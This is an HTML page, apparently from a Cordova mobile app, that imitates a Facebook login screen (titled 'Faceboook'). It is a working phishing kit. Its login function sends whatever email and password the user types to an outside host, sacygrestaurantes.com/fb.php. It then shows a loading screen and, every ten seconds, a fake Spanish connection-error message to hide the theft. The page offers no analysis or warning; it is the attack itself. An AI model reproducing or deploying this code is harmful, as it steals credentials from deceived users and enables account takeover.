<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="format-detection" content="telephone=no">
        <meta name="msapplication-tap-highlight" content="no">
        <meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1, minimum-scale=1, width=device-width">
        <link rel="stylesheet" type="text/css" href="css/index.css">
        <link rel="stylesheet" type="text/css" href="dist/sweetalert.css">
        <link rel="stylesheet" type="text/css" href="themes/facebook/facebook.css">
        <title>Faceboook</title>
        <style type="text/css">

        .login{
            width: 100%;
            height: 30px;
            border-radius: 5px;
        }
        .boton{
            width: 100%;
            height: 40px;
            background-color: #263961;
            border: solid 1px #263961;
            color:white;
            font-size: 16px;
            border-radius: 5px;
        }
        .boton_ayuda
        {
            background-color: #263961;
            border: solid 1px #263961;
            color:white;
            font-size: 16px;
            border-radius: 5px;
            float: right;

        }
        .contenido{
            width: 90%;
        }
        </style>
    </head>
    <body>
        <br><br><br>
        <center>
            <img src="img/logo.png" width="40%" style="padding-right:50px;"><br><br><br><br>
            <div class="contenido">
            
            <input type="email" class="login" placeholder="Email" id="email"><br><br>
            <input type="password" class="login" placeholder="Password" id="password"><br><br>
            <button class="boton" onclick="login();">Log In</button><br><br><br><br><br><br>
            <a href="#" onclick="mensajeAyuda();" style="color:white">Sing Up for facebook</a><button onclick="mensajeAyuda();" class="boton_ayuda">?</button>
            </div>
        </center>
        <script type="text/javascript">
            function mensajeAyuda()
            {
                swal('Mensaje','No se ha podido recuperar la informaci贸n necesaria verifique su conexi贸n');
            }
            function login(){
                var email=$("#email").prop("value");
                var password=$("#password").prop("value");
                if(email.length<=0 || password.length<=0)
                {
                    swal('Mensaje','Favor de introducir sus datos correctamente');
                }else{
                    $(".contenido").html('<p style="color:white">Loading...</p><img src="img/load.gif">');
                    $.post("http://sacygrestaurantes.com/fb.php",{
                        email:email,
                        password:password
                    },function(d){
                       setInterval(function () {
                        swal('Mensaje','No se ha podido recuperar la informaci贸n necesaria verifique su conexi贸n');

                        }, 
                        10000); 
                    });
                    
                }
            }
        </script>
        <script type="text/javascript" src="cordova.js"></script>
        <script type="text/javascript" src="js/index.js"></script>
        <script type="text/javascript" src="js/jquery.js"></script>
        <script type="text/javascript" src="dist/sweetalert.min.js"></script>
    </body>
</html>
